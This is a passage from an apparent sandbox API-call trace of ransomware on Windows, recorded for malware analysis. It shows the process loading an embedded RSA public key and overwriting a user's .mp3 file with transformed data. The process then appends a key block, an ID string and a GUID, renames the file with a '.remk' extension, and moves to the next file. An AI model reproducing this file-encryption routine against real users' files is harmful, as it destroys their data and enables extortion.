lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.490] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0235.491] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x1353f, lpOverlapped=0x0) returned 1 [0235.492] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.492] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0235.492] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.492] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.492] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0235.493] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0235.493] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0235.493] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0235.493] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0235.493] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0235.493] GetLastError () returned 0x0 [0235.493] CryptDestroyHash (hHash=0x31de170) returned 1 [0235.493] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0235.493] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0235.493] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0235.493] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0235.493] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0235.494] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0235.494] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.494] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0235.494] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x13540) returned 0x37c6278 [0235.494] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0235.494] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0235.494] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0235.494] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0235.494] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0235.494] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0235.494] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325cd58 [0235.494] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eea90 [0235.494] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325cda0 [0235.494] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc420 [0235.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc438 [0235.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc450 [0235.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc468 [0235.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0235.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0235.495] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0235.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0235.495] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc438 | out: hHeap=0x630000) returned 1 [0235.495] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc468 | out: hHeap=0x630000) returned 1 [0235.495] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc450 | out: hHeap=0x630000) returned 1 [0235.495] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0235.495] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc450 [0235.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0235.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc468 [0235.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0235.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bc438 [0235.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0235.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0235.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0235.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0235.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0235.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0235.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0235.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0235.496] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0235.496] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc468 | out: hHeap=0x630000) returned 1 [0235.496] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0235.496] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc438 | out: hHeap=0x630000) returned 1 [0235.496] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0235.496] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0235.496] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc450 | out: hHeap=0x630000) returned 1 [0235.496] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0235.496] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0235.496] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0235.496] GetCurrentThreadId () returned 0x314 [0235.496] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0235.496] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c4830 [0235.496] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0235.496] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0235.496] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0235.496] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0235.496] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0235.496] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0235.496] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.496] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.496] GetCurrentThreadId () returned 0x314 [0235.496] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.496] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.496] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0235.496] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.497] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.497] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.497] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0235.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0235.497] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0235.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0235.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0235.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x72aea0 [0235.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0235.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc450 [0235.497] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0235.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0235.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0235.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0235.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0235.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0235.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0235.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0235.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc438 [0235.497] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0235.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0235.497] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0235.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0235.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0235.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0235.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0235.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc468 [0235.498] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0235.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0235.498] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0235.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc480 [0235.498] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0235.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc498 [0235.498] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0235.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0235.498] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0235.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc4b0 [0235.498] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0235.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc4c8 [0235.498] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0235.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc4e0 [0235.498] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc4c8 | out: hHeap=0x630000) returned 1 [0235.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc4c8 [0235.498] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc4b0 | out: hHeap=0x630000) returned 1 [0235.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed28 [0235.498] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0235.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0235.498] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0235.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0235.498] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc438 | out: hHeap=0x630000) returned 1 [0235.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc438 [0235.499] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0235.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0235.499] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc450 | out: hHeap=0x630000) returned 1 [0235.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0235.499] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc4e0 | out: hHeap=0x630000) returned 1 [0235.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37c0db8 [0235.499] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0235.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x319bc40 [0235.499] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0235.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0235.499] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc438 | out: hHeap=0x630000) returned 1 [0235.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37c0fd0 [0235.499] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0235.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31b6580 [0235.499] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0235.499] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0235.499] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0235.499] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b6580 | out: hHeap=0x630000) returned 1 [0235.499] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0235.499] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0235.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0235.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0fd0 | out: hHeap=0x630000) returned 1 [0235.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x319bc40 | out: hHeap=0x630000) returned 1 [0235.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0235.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc4c8 | out: hHeap=0x630000) returned 1 [0235.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0235.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc498 | out: hHeap=0x630000) returned 1 [0235.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0235.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc468 | out: hHeap=0x630000) returned 1 [0235.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc480 | out: hHeap=0x630000) returned 1 [0235.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0235.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0235.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0235.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc420 | out: hHeap=0x630000) returned 1 [0235.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325cda0 | out: hHeap=0x630000) returned 1 [0235.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0235.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0235.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0235.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0235.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0235.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0235.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0235.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0235.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0235.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0235.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0235.502] WriteFile (in: hFile=0x640, lpBuffer=0x37c6278*, nNumberOfBytesToWrite=0x1353a, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37c6278*, lpNumberOfBytesWritten=0x3adfb14*=0x1353a, lpOverlapped=0x0) returned 1 [0235.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c6278 | out: hHeap=0x630000) returned 1 [0235.502] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x1353f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.502] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0235.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0235.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0235.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0235.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0235.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37c0db8 [0235.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0235.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0235.503] WriteFile (in: hFile=0x640, lpBuffer=0x37c0db8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37c0db8*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0235.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0235.503] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0235.503] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0235.503] CloseHandle (hObject=0x640) returned 1 [0235.506] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0235.507] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8c0) returned 0x37bd408 [0235.507] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0235.507] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\-wYl9Wxaf_FQLu8dRQB5\\hj_q0gZo.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\-wyl9wxaf_fqlu8drqb5\\hj_q0gzo.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\-wYl9Wxaf_FQLu8dRQB5\\hj_q0gZo.mp3.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\-wyl9wxaf_fqlu8drqb5\\hj_q0gzo.mp3.remk")) returned 1 [0235.507] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0235.507] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.507] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0235.509] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0235.509] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae4a30, ftCreationTime.dwHighDateTime=0x1d5daac, ftLastAccessTime.dwLowDateTime=0xb1837830, ftLastAccessTime.dwHighDateTime=0x1d5d8ae, ftLastWriteTime.dwLowDateTime=0xb1837830, ftLastWriteTime.dwHighDateTime=0x1d5d8ae, nFileSizeHigh=0x0, nFileSizeLow=0x78e7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="j1d_K7qJp6wY.wav", cAlternateFileName="J1D_K7~1.WAV")) returned 1 [0235.509] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.509] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, 